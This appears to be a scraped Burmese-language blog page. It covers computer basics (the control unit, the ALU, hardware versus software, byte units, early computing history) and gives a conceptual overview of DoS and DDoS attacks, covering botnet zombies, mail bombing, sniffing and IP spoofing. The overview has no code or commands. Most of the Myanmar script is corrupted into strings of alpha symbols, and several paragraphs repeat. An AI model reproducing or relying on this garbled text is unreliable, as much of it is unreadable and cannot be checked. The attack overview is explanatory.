ααိုαိα္းα်ဴα္ αာα (control unit, often called a control system or CPU) αုိαααုα္ α ီαီαူ αα္ αြα္α်ဴαာ၏ α‘α ိα္α‘αုိα္း α်ဳိးα ံုαုိ αα္းေαာα္αα္။ αα္းαα္ ααုိααα္ ၏ αႊα္αΎαားα်α္α်ားαုိ αα ္ေαΎαာα္းျαα္း αα္αွဴ αΏαီး α‘αိααΈါα္ ျαα္αα္။ αိα္းα်ဴα္ αာααα္ α‘αα့္ျαα့္ေαာ αြα္α်ဴαာα်ားαြα္ αα္းαႊα္αΎαားα်α္ α‘α α₯္α်ားαုိ ျαα္αα္ေα αα္α‘αြα္ αုα္ေα်ာ္ αα္αွဴ ျαα္း αုα္ေα့αွိαα္။
αိα္းα်ဴα္ αာα ၏ α‘αိα αွာ ααုိααα္ ေαာα္αာ၊ ေαာα္ αႊα္းαΎαားα်α္ αုိ αα္ေααာαွ αα္αွဴαα္ αုိ αွα္αားαားေαာ α‘αူး αုိေαွာα္αာ αာα်α ္α αာ αုိαျαα ္αα္။
αိα္းα်ဴα္ αာα၏ α‘αုα္α်ားαွာ ေαာα္ α ီαီαူα်ားαြα္ αြာျαားႏုိα္ေαာ္αα္း α‘ေျααံαွာ ေα‘ာα္αါα‘αုိα္းျαα ္αα္။
ααα္း αα်ၤာ αုα္ေαာα္αႈαြα္ ALU αα္ α‘ေျααံα်ားျαα ္αα့္ α‘ေαါα္း၊ α‘ႏုα္၊ α‘ေျαႇာα္၊ α‘α ား၊ ααီαိုႏိုေαααီ αα္αွα္α်ား ႏွα့္ square root αုိα αုα္ေαာα္αα္။ α‘α်ဳိေαာ αုα္ေαာα္αႈ α်ားαွာ αိα္းျαα့္α်ားαုိαာ αုα္ေαာα္ႏုိα္αΏαီး α‘α်ဳိαွာ αိα်αႈ ေαာ့α်ႏုိα္ေαာ္αα္း αႆα αိα္း (floating point) αွ αိα္းα α ္ (real number) α်ားα‘αိ αုα္ေαာα္ႏုိα္αα္။ αုိαေαာ္၊ αα္αα့္ αြα္α်ဴαာααုိ αα္αွ်αα္ αα္αဲေαာ α‘αုα္ျαα ္αါေα αα ္αα့္ျαα္း αြα္αူေαာ α‘αα့္α်ားα‘ျαα ္ ေျαာα္းαα္းေα ျαα္းျαα့္ α ြα္းေαာα္ႏုိα္αα္။ αုိαေαΎαာα့္ αα္αα့္ αြα္α်ဴαာααုိ αα္αုိ ααα္းαα်ၤာျαႆαာααုိ ေျααွα္းႏုိα္αΏαီး αα္း၏ ေα‘α္α္αူ α αုိα္αုိα္ ေျααွα္၍αααါα αြα္αုိα္ေαာ္αα္းျαα့္ ေျααွα္းႏုိα္αα္ ။
#C_M_H
Hardware αိုαာα α‘αွα္းαံုးေျαာααα္ αα္αဲααိုα္αြα္αုိαααဲ့ αα α₯α္းေαြျαα ္αါαα္။
α₯ααာ။ ။ monitor၊ mouse
Software αိုαာα αα္αဲααိုα္αြα္αုိααααဲ့ αြα္α်ဴαာα‘αံုးျαဳ αα α₯α္းαိုα ေျαာαα္αα္းαွα္αါαα္။
program α်ားαိုု α ုေαာα္းαားαာαို software αိုαေαααါαα္။ software αိုαာ αြα္α်ဴαာαို αာαုα္ααα္၊ αα္α‘α်ိα္αွာ αုα္αααဲαိုαာ αိα္းေα်ာα္းေαးαဲ့ αြα္αΎαားα်α္ α‘α ုα‘ေαးαα္းျαα ္αါαα္။ software ααါαဲ αြα္α်ဴαာ αာαွαုα္αုိαααααို hardware ααါαဲαဲααα္း αြα္α်ဴαာ αာαွ αုα္αုိαααွာ ααုα္αါαူး။
software αွာ ႏွα ္α်ိဳးαα္αြဲαါေαးαα္။
α။ application software
α။ system software
application software
application software αိုαာαေαာ့ application ေαြαွာ α‘αံုးျαဳαိုα α‘αုα္αုα္αိုα user (α‘αံုးျαဳαူ)ေαြαို α‘αူα‘αီေαးαဲ့ software ေαြျαα ္αါαα္။
system software
system software αိုαာαေαာ့ hardware ေαြ α‘αုα္αုα္ႏိုα္αိုαα‘αြα္αဲα application software ေαြ α‘αံုးျαဳႏိုα္αα္α‘αြα္ maintain αုα္ေαးαါαα္။
ေαာα္ျαီး αြα္α်ဴαာαွာ ααα္း ႏွα ္αံုးαဲααဲ α‘αုα္αုα္αါαα္။ 0 αဲ. 1 αါ။ Binary number αိုααဲေαααါαα္။ Binary Digit αိα္းαိုααဲေαααိုααါαα္။ α‘αိုေαာα္αိုေαာ့ Bit αိုαေαααါαα္။
ααα္းαα ္αုံး၊ α ေα့αားαα ္α်α္၊ α ာαα ္αံုးαိုαိုαα္ 8 bit αိုαေαααါαα္။
01010101 ααုαို 0 αဲα 1 ေαြα်α္းαါαဲ့ ααα္း 8 αံုးαြဲαို 8 bit αိုαေαααΏαီး 8 Bit αာ 1 byte αဲα αီαွ်αါαα္။
| 1 bit (binary digit*) = the value of 0 or 1 |
| 8 bits = 1 byte |
| 1024 bytes = 1 kilobyte |
| 1024 kilobytes = 1 megabyte |
| 1024 megabytes = 1 gigabyte |
| 1024 gigabytes = 1 terabyte |
| 1024 terabytes = 1 petabyte |
| Abbreviations |
| 1 kilobyte = 1 k |
| 1 megabyte = 1 MB |
| 1 gigabyte = 1 GB |
| 1 terabyte = 1 TB |
| 1 petabyte = 1 PB |
| Size in "bytes" |
| Kilobyte (KB) = 1,024 |
| Megabyte (MB) = 1,048,576 |
| Gigabyte (GB) = 1,073,741,824 |
| Terabyte (TB) = 1,099,511,627,776 |
| Petabyte (PB) = 1,125,899,906,842,624 |
αြα္α်ဴαာααိုα္း
ေαွးααα္α αြα္α်ဴαာ αို αα္αွα္αိုα αα္α‘αြα္ααာαွαα္αဲ α့ဲ αα္။ααုα‘α်ိα္αြα္αူαြα္α်ဴαာαို α‘αα္α‘α်ဳိးα်ဳိး ေααေαααα္αွα္αဲ့αΎαျαီျαα ္αα္။ ααုα‘α်ိα္αြα္αူαိαိαာα်ား (Devices) ေαာ္ေαာ္α်ားα်ားαို αြα္α်ဴαာ αα္ျαီးေααေααΎαျαီျαα ္αα္။α‘ေα ာαံုး αြα္α်ဴαာ αα္ αြα္α်α္αႈαိုα္းαို ေααီး(Abacus)α်ားαွ α αဲ့αα္။ ေααီးαα္ ααααံုးααα္းေαါα္းα α္ αα္ျαα ္αα္။ ေααီးαို ααုα္ျαα္αြα္ α αα္α‘αံုးျαဳαဲ့αα္။
α‘αα္ေαα္α‘ေαာα္αြα္ α₯ေαာα αα်ာၤ ႏွα့္ α‘α္α်α္αီαာ ααာαွα္ Wilhelm Schickard α αααααုႏွα ္ αြα္ ααααုံး α α္αα α₯α္းႏွα့္αြα္α်α္ေαာααα္းေαါα္းα α္(Calculators) αα ္αုαို αα္ေαာα္αဲ့αα္။αိုαေαာ္αα္းααုေαα္αြα္ ၎ αိαိαာDevice αို αြα္α်ဴαာ αုိαေαααို၍ ααေαာ့ေα။α‘αα္ေαΎαာα့္αို ေαာ္၎αိαိαာαα္ Programmed αါαα္ျαα္းααွိေαာေαΎαာα့္ျαα ္αα္။ αααα αုႏွα ္ αြα္ Joseph Marie Jacquard αα္ Textile αα္αα္းα α္αို α‘ေျααံျαီး Punched Paper Cards Series αို α‘αံုးျαဳျαီး αူα၏ αα္αα္းα α္αို α‘αုိα‘ေαွ်ာα္ α‘αုα္αုα္ေα αဲ့αα္။ Jacquard ၏ αα္αα္းα α္αွ ααα္αα္ αြα္α်ဴαာ ျαα ္ေαααိုးαα္αာေα αိုααα္ α‘ေαΎαာα္းαα္း αα ္αα္ျαα ္αα္။ αααα αုႏွα ္ αြα္ Charles Babbage αα္ Programmable Mechanical Computer αို α αα္ Design ေαးαြဲαဲ့αα္။ Analytical Engine αုα‘αα္ေαးαဲ့αα္။ αααα αုႏွα ္ α‘ေαာα္ αြα္US Census α Punched Card α‘αြα္ αΎαီးαားေαာ Scale Automated Data Processing α ြα္းေαာα္αα္αိွေα‘ာα္ Tabulating Machines αို Herman Hollerith α Designed ေαးαြဲαဲ့αα္။ Computing Tabulating Recording Corporation ( ααုα‘αါ IBM ျαα ္αာαα္ ) α αုα္αုα္αဲ့αါαα္။
αα αာα ု α‘αုα္α‘ေαာα္ αြα္αြα္α်ဴαာ ေαြαာ α‘αံုးαα္ေαာα‘αာαα ္αုျαα ္αာαဲ့αα္။ αြα္α်ဴαာ αα္ αူαိုα α‘αြα္αိုα‘α္ေαျαီαိုαာα αα္ေαျααိုα္ျαီးျαα ္αα္။ α‘αα္ေαΎαာα့္αိုေαာ္ Punched Card, Boolean Algebra , The Vacuum Tube (Thermionic Value) αဲα Teleprinter ေαြαာ ေααေαါα္αဲ့ေαာေαΎαာα့္ျαα ္αα္။αα αာα ု α‘ေαာα‘αြα္းαြα္ αိααΈံααာαα္ α်ားα ြာαိုးαα္αႈαိွαာαဲ့ျαီး Analog Computer α်ားαα္း αိုးαα္ေααေαါα္αဲ့αα္။ αိုαေαာ္αα္း၎ αြα္α်ဴαာα်ားαα္ Programmable αျαα ္αα္αα‘ျαα္ α‘αုေαα္ Digital αြα္α်ဴαာ α်ား၏ αိα်ေαာ α ြα္းေαာα္αα္ α်ားαα္းαါαα္ျαα္း ααိွေαးေα။
αြα္α်ဴαာ α‘αုα္αုα္αံု
ေααုα်αံုး αြα္α်ဴαာ αြα္ α‘αိα ေαးα်ဳိးαွာ ααα္း αα်ၤာ ႏွα့္ ေαာ့α်α ္ α‘α ိα္α‘αိုα္း (arithmetic and logic unit)၊ αိα္းα်ဴα္ α‘α ိα္α‘αိုα္း (control unit)၊ αွα္α₯ာα္(Memory Device) ႏွα့္ α‘αြα္း α‘αုα္ αိαိαာ (I/O) α်ားαုိα ျαα ္αα္။ αα္း α‘α ိα္α‘αုိα္း αုိααုိ αါαာααိဳးα်ား α‘αြဲαုိα္ျαα ္ေαာ αα္α ္ α်ား ျαα့္ αြα္α်ိα္αားαα္။
αိα္းα်ဳα္αာα
ααိုαိα္းα်ဴα္ αာα (control unit, often called a control system or CPU) αုိαααုα္ α ီαီαူ αα္ αြα္α်ဴαာ၏ α‘α ိα္α‘αုိα္း α်ဳိးα ံုαုိ αα္းေαာα္αα္။ αα္းαα္ ααုိααα္ ၏ αႊα္αΎαားα်α္α်ားαုိ αα ္ေαΎαာα္းျαα္း αα္αွဴ αΏαီး α‘αိααΈါα္ ျαα္αα္။ αိα္းα်ဴα္ αာααα္ α‘αα့္ျαα့္ေαာ αြα္α်ဴαာα်ားαြα္ αα္းαႊα္αΎαားα်α္ α‘α α₯္α်ားαုိ ျαα္αα္ေα αα္α‘αြα္ αုα္ေα်ာ္ αα္αွဴ ျαα္း αုα္ေα့αွိαα္။
αိα္းα်ဴα္ αာα ၏ α‘αိα αွာ ααုိααα္ ေαာα္αာ၊ ေαာα္ αႊα္းαΎαားα်α္ αုိ αα္ေααာαွ αα္αွဴαα္ αုိ αွα္αားαားေαာ α‘αူး αုိေαွာα္αာ αာα်α ္α αာ αုိαျαα ္αα္။
![]() |
| MIPS architecture ၏ αႊα္αΎαားα်α္ αုိ αိα္းα်ဴα္ αာααွ αα္αွဴαံု ေαာ္ျαေαာ αံုαΎαα္း |
αိα္းα်ဴα္ αာα၏ α‘αုα္α်ားαွာ ေαာα္ α ီαီαူα်ားαြα္ αြာျαားႏုိα္ေαာ္αα္း α‘ေျααံαွာ ေα‘ာα္αါα‘αုိα္းျαα ္αα္။
- ααုိααα္ ေαာα္αာ αႊα္ျαေαာ α‘αα္းαွ αာαα့္ αႊα္αΎαားα်α္ (instruction) αုα္αုိ αα္αါ။
- αα္းαႊα္αΎαားα်α္ αုα္αုိ α‘αိααΈါα္ ျαα္αΏαီး α‘αိα္αေαးα်α္ (command) α်ား αုိαααုα္ α‘ျαားα α္α်ား၏ α‘αα္αႈိα္း (signal) α်ား α‘ျαα ္ αုα္ေαာα္αါ။
- αႊα္αΎαားα်α္ α‘αα ္ေαးαα္ ααုိααα္ ေαာα္αာαုိ αα ္αုျαα့္αါ။
- αႊα္αΎαားα်α္ αါαွ်α္ αွα္α₯ာα္(Memory Device) α‘αα္းα်ားαွ α‘α်α္α‘αα္α်ားαုိ αα္αါ။ α်ားေαာα‘ားျαα့္ αα္းαα္αွဴααα့္ α‘αα္းαံαါα္αုိ αႊα္αΎαားα်α္ αုα္ αα္αွာαα္ αိα္းαီးေα့αွိαα္။
- αႊα္αΎαားα်α္ αα္ ေα‘α‘α္α္αူ αုိαααုα္ α‘αူးα α္α်ားαွ αုα္ေαာα္α်α္α်ား αုိα‘α္αွ်α္ αα္းα α္α‘ား ေαာα္းႏွα္αါ။
- ေα‘α‘α္α္αူαွ α‘ေျααုိ αွα္α₯ာα္(Memory Device)αြα္းαုိα ျαα္αα္αိα္းαα္းαါ αုိαααုα္ ααα့္αာ αဲ့αုိα αံုႏွိα္α α္ α်ားαြα္ αုα္αါ။
- α‘α α‘αα့္ (α) αုိα ျαα္αြားαါ။
- Main articles: Arithmetic logic unit and ေα‘α္α္αူ
ααα္း αα်ၤာ αုα္ေαာα္αႈαြα္ ALU αα္ α‘ေျααံα်ားျαα ္αα့္ α‘ေαါα္း၊ α‘ႏုα္၊ α‘ေျαႇာα္၊ α‘α ား၊ ααီαိုႏိုေαααီ αα္αွα္α်ား ႏွα့္ square root αုိα αုα္ေαာα္αα္။ α‘α်ဳိေαာ αုα္ေαာα္αႈ α်ားαွာ αိα္းျαα့္α်ားαုိαာ αုα္ေαာα္ႏုိα္αΏαီး α‘α်ဳိαွာ αိα်αႈ ေαာ့α်ႏုိα္ေαာ္αα္း αႆα αိα္း (floating point) αွ αိα္းα α ္ (real number) α်ားα‘αိ αုα္ေαာα္ႏုိα္αα္။ αုိαေαာ္၊ αα္αα့္ αြα္α်ဴαာααုိ αα္αွ်αα္ αα္αဲေαာ α‘αုα္ျαα ္αါေα αα ္αα့္ျαα္း αြα္αူေαာ α‘αα့္α်ားα‘ျαα ္ ေျαာα္းαα္းေα ျαα္းျαα့္ α ြα္းေαာα္ႏုိα္αα္။ αုိαေαΎαာα့္ αα္αα့္ αြα္α်ဴαာααုိ αα္αုိ ααα္းαα်ၤာျαႆαာααုိ ေျααွα္းႏုိα္αΏαီး αα္း၏ ေα‘α္α္αူ α αုိα္αုိα္ ေျααွα္၍αααါα αြα္αုိα္ေαာ္αα္းျαα့္ ေျααွα္းႏုိα္αα္ ။
#C_M_H
IT ေαာαααီးαို αΏαိα္းေျαာα္ေαေαာ DDOS attack α‘ေαΎαာα္း
January 16, 2019
No comments
DoS αုိαဲα αုိα္αုိα္αႈαာ αေααေαα္αွာ α‘α္αာαα္ αုိα္αုိα္ေαးααားαုိα α‘αုံးαΏαဳαဲα αα္းαα္းαα ္αုαα္းαΏαα ္αါαα္.. Denial of Service αုိαဲαα‘αုိα္း α‘αုိα္ αုိα္αံααူαဲα Computer αုိαααုα္ Webserver αဲα Bandwidth , CPU, Memory α‘αုံးαΏαဳαႈေαြα αာαာα္ေαးα ြα္းႏုိα္αဲα ααာααα္ αုိαΏαီးαုိα‘α္αဲαα‘αြα္ Out of Service ေαြ αΏαα ္αုα္αာαါ။ αΎαားαΏαα္၍ Resource α‘ားαုံးαုိ α ားαုံးαုိα္αΏαα္းαဲ αΏαα ္αါαα္။ αα္αΏαီး αွα္းေα‘ာα္ေαΏαာααα္αုိαα္ αα½ြα္ေαာ္αုိααwww.planetcreator.net αုိαΏαီး Browser αွာαုိα္αα့္αုိα္αα္ ေαာα္αွာ α‘αုα္ αုα္ေαးαာαwww.planetcreator.net αα္αားαဲα Webserver α α‘αုα္αုα္ ေαΏααΎαား၊ ေαာ္ေαာα္ေαးααာαΏαα ္αါαα္။ αီေαာ့ αာαာα္ေαာα္းαုိαႈαဲα αုိαဲα Fade Request ေαြαုိ server ααΏαα္αα္ေαΏααΎαား ေαးေαααဲαα‘αြα္ Over Load αΏαα ္αာ Server α αα္αြα္αႈαα္αα္ααြားααΏαα္းαΏαα ္αါαα္။
DoS αုိα္αုိα္αႈαွာ αα္αွα္αားαဲα Targeted System (Victim) αဲα αα္း System αဲα Port, network component, firewall αုိ α‘αိα‘α်ေαြးα်α္ αုိα္αုိα္αာαΏαα ္αဲα α‘αΏαα္ printer ေαြ Alarm System ေαြαΏαα္ေαာα္αြားေα‘ာα္ αုိα္αုိα္αာαα္းαွိαါαα္....
αါေαΎαာα့္ DoS α‘αုိα္αံααΏαီαုိαα္
* Network αဲα α ြα္းαα္α်αα္းαာαΏαα္း (ေႏွးေαြးαာαΏαα္း)
* Website α်ားαုိ α‘αုံးαΏαဳαဲαα‘αါ α‘αုံးαΏαဳ၍ αααΏαα္း (αုိα္αုိα္αဲααူα http server αုိ request α‘ေαΏαာα္α‘α်ားေαာα္းαုိαΏαα္းေαΎαာα့္)
* spam mail ေαြ α‘αα္α်ားαာαΏαα္း ( Mail Server α်α္α ီးαα္/αုိα္αုိα္αူα α‘α်ိα္αုိα‘αြα္းαွာ ေαးα္ေαြ ေαာα္ေαါα္းα်ားα ြာαုိ victim α‘ားαုိαေαာα္ေαာေαΎαာα့္)
* Computer or Webserver α်ားαဲα CPU & Memory Usage ေαြ αΏαα့္αα္ေααΏαα္းαုိααုိေαြααႏုိα္αါαα္။
αုိα္αုိα္αုံ
DoS αဲα αုိα္αုိα္αုံαေαာ့ Peer to Peer αုိα္αိုα္ααုိαါαဲ... α‘αူးαΏαဳαုα္αားαဲα DoS Tool ေαြαဲα Vitim αဲα host αုိαααုα္ ip address and port ေαြαုိ α‘α်ိα္αုိ α‘αြα္းαွာ request ေαါα္းα်ားα ြာေαာα္းαုိ α‘αုံးαΏαဳαΏαα္းαဲαΏαα ္αါαα္။
αုိα္αုိα္αဲα αႈαြဲေαြαေαာ့
* ICMP Flood
* Teardrop Attack
* Peer-to-Peer Attack
* Permanent Denial of Service
* Application Level Floods (IRC Floods)
* Nuke
* Distributed Attack
* Reflected Attack
* Degradation-of-Service
* Unintentional Denial of Service
* Denial of Service Level II
* Blind Denial of Service
DDoS ( Distributed Denial of Service) αုိαာ DoS αဲα Advanced Version αα ္αုαုိα αုိႏုိα္αါαα္။ αα ္αွα္ Server αα ္αုαုိ flooding packets ေαါα္းα်ားα ြားα‘ာ
single network αα ္αုααα္ ααုα္αဲαဲα Multiple host or network ေαြαေααုိα္αုိα္αာαါ။ DDoS α αေααေαα္α‘αြα္ αုαာ ααၳိေαးααွိααုိαΏαα ္ေααΏαီး αိαိαုံး
αဲα Server αဲα Security α‘ားαα္းαာαα္း αΏαα ္αိα္ααုိ site αဲα security ေα ာα့္αΎαα့္αူαေαြα‘ားαα္းαူαေαΎαာα့္αα္း αΏαα ္αါαα္။
αα္αုိαဲαΏαα ္ေα DoS αဲα DDoS αုိαα½ြα္ေαာ္αုိα αα္αΏαီး α‘αα္းαα္ α‘α်α္α်ဲα αΎαα့္αေα‘ာα္.. αα½ြα္ေαာ္α αူαα ္ေαာα္αုိ α ိα္αုိα္းαုိα္αာ ေႏွာα္αွα္α်α္αα္αုိαα္ α‘ဲααူαဲα αုα္းαံαါα္αုိေαာα္ႏုိα္αုိα္αα္.. αΏαီးαα္ α‘ဲααူαားေαာα္ေαာα္αဲα α‘α်ိα္α်αွ αုα္းαုိ ေαာα္α်αုိα္αα္.. αီαုိα‘αΎαိα္α‘ေαα‘αြα္ α်ားαာαဲααα္αုိαα္ αα ္αα္ααူαα္းα‘ေႏွာα္α‘αွα္αΏαα ္αα္... α ိα္αα ္αα္ေαါα.. αါαာ Attacker to Victim αုိα္αုိα္ αα္ႏြα္αဲα DoS αα္းαα္းαဲ... αါေααဲα Victim α αα္းααာေαာα္းαΏαီး Attacker αဲα αုα္းαံαါα္ေαးαα ္αုαα္းαုိαဲ Block αုα္αားαုိα္αα္αုိαα္ Attacker α ေαααုိαααွာααုα္ေαာ့αူး ... αီαုိα‘α်ိα္αွာ Attacker α αα္ေαာα္း၍ αα ္αΏαားαα္းαα္းαုိαုံးαာαိα့္αα္.. α‘ဲααါαေαာ့ Radio Station ေαြαေααΏαီးေαာ့ αာαα့္αα္ေαα αα္α‘α်ိα္αွာ αα္αြဲα‘αြα္ αα္αွα္ေαြαုိ ေα ်းႏႈα္းα်ဳိαာα ြာေαာα္းα်ေααα္... ေαာα္αα္ αα္ေααာαွာ α‘ႏၱαာα္αဲαေαြαေααα္.. αီαုိ Fade ေαြαုိ Victim αဲα αα္αုိα္αဲααူေαြαုိ ααα္းေαးαုိα္αα္αုိαα္ Victim αဲα αိα္ေαြα‘ေαါα္းα‘αα္းေαြααα္း Victim αုိ αα ္ေαာα္αΏαီးαα ္ေαာα္ αုα္းαα္ α‘ေαΎαာα္းαΎαား α‘αိေαးေαေαာ့αွာαါαဲ.. αါα Distributed αုα္αα္αုိα ေαααα္.. αα ္αα္းα‘ားαΏαα့္ DDoS ေαါα...
Distributed αုα္αဲαေααာαွာ Attacker (Hacker) ေαြα Malware, Virus ေαြαဲααΏαα ္ေα Fade Mail, Social Engineering αဲααΏαα ္ေα α‘ြα္αုိα္းαုိ αΏαα္ααုိα္αါαα္... αα္း Attacker αဲα Malware,Virus ေαြ αိαိα α္αဲαုိေαာα္αာαာαဲαΏαα ္ေα Social Engineering αဲαေαာα္αာαာαဲ αΏαα ္ေα αိαိαဲα α α္αာ Attacker αဲα α‘αုံးα်αံαΏαα ္αြား αါαΏαီ... αါαုိ Zombie αုိαေαααါαα္... αီ Zombie ေαြαာ αα္αာေαြαဲα αုိα္းေα αာαုိ αုα္ေαာα္αုိα α‘α်ိα္αုိα္းα‘αα့္αွိေααΎααါαα္... αီαုိα‘ြα္αုိα္းαွာ αα္αာေαြ αဲα α‘αုံးα်αံေαααဲα Zombie ေαြα ααα္းαါαူး။ αီα‘α်ိα္αွာ αုိα္αုိα္αဲα Attacker (Hacker) α αα္းαဲα Zombie ေαြαုိ α‘α်ိα္၊ ေααာ ေαြαုိ αြα္αΎαားေαးαုိα္αာαဲα Victim αုိ α‘ားαုံး Fade Request, Fade Mail ေαြ αုိαေαာα္αΎααာαါαဲ...
Fade Mail αုိαာα Mail Bomber αုံα ံα်ဳိး αα ္αΎαိα္αွာ ေαးα္ေαါα္း ေαာα္းαဲα α်ီαΏαီး αုိαေαာα္ႏုိα္ααုိ αα္းαုိ Distributed αုα္αΏαီးαုိα္αုိα္αာαα္းαွိαါαα္... αာαာα္ user αα ္ေαာα္α αုိαူαြားαα္αဲα Website (www.abc.com) αα ္αု αွိαα္αုိαΎααါα ုိα .. Attacker α αα္းαဲα Website αွာ α ိα္αα္α ားα αာ ေαΎαာ္αΏαာေαး αα ္αုαα့္αားαα္ ... αီα‘α်ိα္αွာ αα္း site (www.abc.com) αုိαာေαာα္αα္αα္αဲααူေαြα αα္း ေαΎαာ္αΏαာ္ေαးαုိ ႏုိα္αုိα္αုိα္းαွာ Attacker αΎαိဳαα္αα္αွα္ αားαဲα Victim αဲα mail server αုိ ေαးα္ေαါα္း ေαΏαာα္α်ားα ြာ αုိααΎααါαိα့္αα္... αီαုိα‘α်ိα္αွာ αα ္αα္α SMTP/POP α αα့္ Mail Server ေαြα Down αြားႏုိα္αါ αα္။
αါαာ αုိးαွα္းαဲα αုိα္αုိα္αႈαဲαွိαါေαးαα္...DoS and DDoS αုိα္αုိα္αႈαွာ 'packet-forgery' ေαααဲα packet α‘αုα‘ေαာα္ αα္αီးαΏαα္း၊ 'IP spoofing' ေαααဲα IP Address αုိ packet αဲαα‘αူေαΏαာα္းαဲαΏαα္း α αα္α‘α်ားαΎαီးαွိαါေαးαα္..
αီေααာαွာ Ethernet αုိαာαုိ αဲαဲေαး αူαိα္းαားαα္ေαာα္αဲα αုံα ံαဲα ေαΏαာαါαα္.. Ethernet αဲα System ေαြαα္αြα္αႈαွာ "packets" frames ေαးေαြ ααွိαါαα္ α‘ဲα frame αဲ destination address, source address type field and data ေαးေαြαါαα္αါαα္... Ethernet address α 6 bytes αွိαΏαီး αα္းαုိααဲα αုိα္αုိα္ Ethernet Address αα ္αုα ီ αွိαΎααါαα္။ Ethernet α α‘αုံးαΏαဳαာα CSMA/CD (Carrier Sense and Multiple Access with Collision Detection) αုိα‘αုံးαΏαဳαာαΏαα ္αဲαα‘αြα္ αα္းαုိαα Data αα ္αုαုိαေαာ့αα္αုိαα္ αα္းαုိααα့္ Destination αα္းေαΎαာα္းေαααွာ αူαုိαေαာα္αဲα Data ေαြ αွိααွိα α ္αါαα္... αွိေαးαα္ ေααၱαα ေα ာα့္αΏαီးαွ αα္αုိααါ αα္... αီαုိαုα္αာαုိ Collision Detection αုα္αα္αုိαေαααါαα္.. αီေαာ့ αα ္αါαုိαႏုိα္αΏαီး αα္αံαာαေαာ့ α‘αα္ααΏαα္αα္αံႏုိα္αα္αုိαဲα αေαာေαါα....
αါαုိ α₯ααာαα ္αုαα္ေαးαα္... Ethernet technology αုိαာ α‘ေαွာα္αα္းαဲαွာ αူေαြαုိα္းαြဲα α αားေαΏαာαာαဲααူαါαα္... α‘αα္းαဲαွာαα္αူေαΏαာေαΏαာ α‘ားαုံးα αΎαားαါαα္.. αါα Carrier Sense αΏαα ္αါαα္။ α‘αα္းαဲα αူαုိα္းα αူαုိα α ိα္αႏα΅αွိαα္ ေαΏαာαုိႏုိα္αါαα္.. αါα Multiple Access αΏαα ္αါαα္.. αါေααဲαေαΏαာαဲααူ ေαြαုိα္းα αα₯္ေα်းαိα္ေαြααဲαα‘αြα္ α αားေαΏαာαဲα ေααာαွာ αα္αΏαα္αΎααα္ေαါα... α‘αα္၍ αα ္ေαာα္α α αားေαΏαာαဲαα‘αါαွာ ေαာα္αα ္ေαာα္α ααααα ္ ေαာα္αဲα α αားα‘αΏαီးαုိေα ာα့္αΎααΏαီး αာαွαေαΏαာαါαူး... αါα Collision Detection αΏαα ္αါαα္။ α‘αα္းαဲαွာ αွိαဲα αူေαြαွာ αာαα္αုိα္α ီαွိαΎααါαα္.. αါα unique Ethernet address αΏαα ္αါαα္... αီα‘α်ိα္αွာ α‘αα္းαဲα αူαα ္ေαာα္α " Hello, brb, I'm PlanetCreator " αုိαေαΏαာαα္ αါα Ethernet destination and source
address αΏαα ္αါαα္... ေαΏαာαဲααူα α‘ားαုံးαုိ ေαΏαာα်α္αα္αုိαα္ "Hello everyone, I'm PlanetCreator" αုိαေαΏαာαါαိα့္αα္.. αါα Broadcast Message αုိαေαααါαα္ α‘αΏαα ္α‘α်ားαုံးαေαာ့ αီα‘αα္းαဲαွာ αွိαဲααူေαြα‘ားαုံးα αα ္ေαာα္αုိ αα ္ေαာα္ αုံαΎαα္αဲαα‘αြα္ α αားαုိ α်ဳိααွα္α်α္ααါαဲ αြα့္αြα့္αα္းαα္းေαΏαာαΎααါ αα္... αါα non-encrypted data communication is common αΏαα ္αါαα္..
αီα‘α်ိα္αွာ α‘αα္းαဲαုိ αူα ိα္းαα ္ေαာα္α αα္αာαα္αုိαါα ုိα αါαုိ (has tapped that Ethernet segment) αုိααα္αွα္αα္... α‘αဲαွာေαΏαာαဲααူေαြα‘ားαုံးα α်ဳိααွα္α်α္ααွိαဲေαΏαာααုိ αα္ေαာα္αာαဲα αူα ိα္းααα္း α αားαိုα္းαုိ αေႏွာα္αွα္αဲ αုိα္αΏαီးαားေαာα္ေααα္ .. αါαုိ Sniffing αုα္αα္αုိαေαααα္... αΏαီးαα္ α‘αα္းαဲα αΏαα္αြα္αြားαα္... αာαွေႏွာα္αွα္αႈααုα္αဲααဲαα‘αြα္ αူααုိ Detect αုα္αုိααα္αါαα္.. αီေαာα္αါαဲ...
αီα‘α်ိα္αွာ αα္ေαာα္αာαဲα αူα ိα္းα α‘αα္ααΏαα္ေαΏαာေααα္αုိαα္ αါα DoS to that segment of the Ethernet αΏαα ္αα္αုိαေαααΏαီး αူαα ္ေαာα္αα္းαα္αာα α α‘αΏαားαူα်ားαုိαါ α αားေαြ αα ္αΏαိဳα္αα္αဲေαΏαာေα‘ာα္ αုα္αα္αုိαα္ DDoS ေαါα... αΏαီးαα္ α‘αα္းαα ္αုαုံး αα္αံαα္ααα္αΏαα ္αြားေαာ့ α αားαုိα္းေαααဲα server α်α္αΏαီေαါα...
αူα ိα္းα ααααုိ α αားေαြေαΏαာαဲαα‘αါ α‘αΏαားαူαα ္ေαာα္αုိ α‘αံα်ဳိးαဲα ααΏαီး α αားေαΏαာαα္.. ေαာα္αα ္αါ ေαာα္αα ္ေαာα္ ေααံαဲα α‘αံαုαုα္ေαΏαာαα္ αုိαα္ αါα IP Spoofing αုα္αα္ေαααα္... αΏαီးαα္ ေαာα္αα ္ေαာα္αုိ αာαα္α‘αုαဲα α αားေαြေαΏαာေααα္αုိαα္ packet forgery αုိαေαααα္...
αာαာα္α‘αြα္ Attacker (Hacker) α How are you ? αုိαဲα ေαးα္αြα္းαုိ Server (Victim) α I'm fine αုိαΏαီးαα ္αါေαΏαႏုိα္αါαα္။ αါေααဲα Attacker αα္αီးαားαဲα Zombie ေαြα αα ္α်ိα္αα္း αα ္αΏαိဳα္αα္း How are you? How are you? How are you? αုိαΏαီး α‘ုံαုိα္ေαးαဲαα‘αါ server α αα ္ေαာα္αုိေαΏααΎαားေαးαΏαီး ေαာα္αα ္ေαာα္αုိ ေαΏααΎαားေαးαုိα αုα္ေαာα္ααါαα္... αီαုိေαΏααΎαားေαααာα်ားေαာ့ CPU ေαြ RAM ေαြα ααံႏုိα္ေαာ့αါαူး။ αါေαΎαာα့္ αα္αြα္αႈေαြ αΏαα္ေαာα္αြားαာαါ။ Server Overload αΏαα ္αΏαီး Data ေαြ αုံးαႈံးαဲαα‘αိ αΏαα ္αα္αါαα္။
